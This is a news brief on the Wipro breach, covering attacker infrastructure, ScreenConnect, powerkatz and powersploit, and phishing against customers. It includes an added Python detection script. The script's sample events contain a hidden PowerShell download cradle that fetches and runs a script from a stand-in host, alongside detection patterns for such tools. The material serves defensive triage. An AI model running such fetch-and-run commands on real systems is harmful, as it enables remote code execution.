Dive Brief:
- The hack on Indian outsourcing and consulting company Wipro involved actors linked to other attacks dating back to 2017 and potentially 2015, and "the re-use of infrastructure from those older attacks," according to research done by Flashpoint.
- The intruders used ScreenConnect, a remote access software application for desktops, on Wipro's machines and domains that were hosting powerkatz and powersploit scripts, according to Flashpoint. Powerkatz is used for searching memory for credentials or other authentication keys whereas powersploit is used "during penetration-testing engagements to launch exploits at a target."
- Last month security journalist Brian Krebs reported Wipro's breach enabled intruders to launch phishing schemes against "at least a dozen" of the company's customers. Wipro's customers tracked the "suspicious network reconnaissance activity" to partner systems that were in direct communication with Wipro's network.
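As an added detection example (not from the article or from Flashpoint's research), the Python below flags the tool chain described above in process-creation records: a script host launched under a ScreenConnect client process, a download cradle in that session, and command lines naming powerkatz or powersploit. The sample events, their field names and the ScreenConnect binary name are constructed assumptions, not data from the Wipro incident.

```python
import re

# Constructed process-creation events in the style of a Sysmon/EDR export.
# Paths, hosts and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/powerkatz.ps1')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Import-Module PowerSploit"},
]

# Assumed name fragment of the ScreenConnect client binaries.
REMOTE_ACCESS_PARENTS = ("screenconnect",)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")
# Tool names the article reports were hosted on the attacker domains.
TOOL_MARKERS = re.compile(r"powerkatz|powersploit", re.I)
# Common in-memory download-and-run patterns.
CRADLE_MARKERS = re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I)


def classify(event):
    """Return the reasons an event is suspicious (empty list = nothing flagged)."""
    reasons = []
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"]
    from_rat = any(frag in parent for frag in REMOTE_ACCESS_PARENTS)
    is_script_host = image.endswith(SCRIPT_HOSTS)
    if TOOL_MARKERS.search(cmd):
        reasons.append("known post-exploitation tool name in command line")
    if from_rat and is_script_host:
        reasons.append("script host spawned by remote-access tool")
        if CRADLE_MARKERS.search(cmd):
            reasons.append("download cradle run under remote-access session")
    return reasons


def find_suspicious(events):
    """Map event index -> reasons for every event that triggers at least one rule."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}
```

Run against SAMPLE_EVENTS it flags events 0 and 3; the benign backup script and the plain shell spawn are left alone, which is the kind of triage a partner would need to do after Wipro's customers noticed reconnaissance from its network.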
Dive Insight:
The best hacks are the ones that go for a slow bleed. It's common to hear about hacks that live in systems for months, if not years.
Equifax's breach was the product of a bug that was left unpatched for months before it was finally exploited. Marriott's breach was the result of an intrusion that occurred in 2014, two years before it acquired the company with the exploited systems.
Bad actors that slip into a network unnoticed follow "surprisingly detailed blueprints" of the enterprise they're hacking, Mark Bower, GM and CRO at Egress Software, told CIO Dive, but the access point usually starts with human error, like falling for phishing. Finding a weak link in the communication chain to steal credentials, gaining access, taking over processes and "mapping out weak points" is the traditional pattern hackers follow.
Wipro's breach undermines the supply chain and its ability to securely partner with companies. Disclosing the intrusion to the impacted parties is one of the first steps an exploited company should take, according to Bower. "The worst case scenario is triggering another attack because supply chain risk details weren't shared securely with trust."
Wipro launched an investigation after learning of the "coordinated and advanced phishing campaign" targeting its customers, according to a Wipro statement emailed to CIO Dive. "We have engaged an independent forensic firm to assist us in the investigation."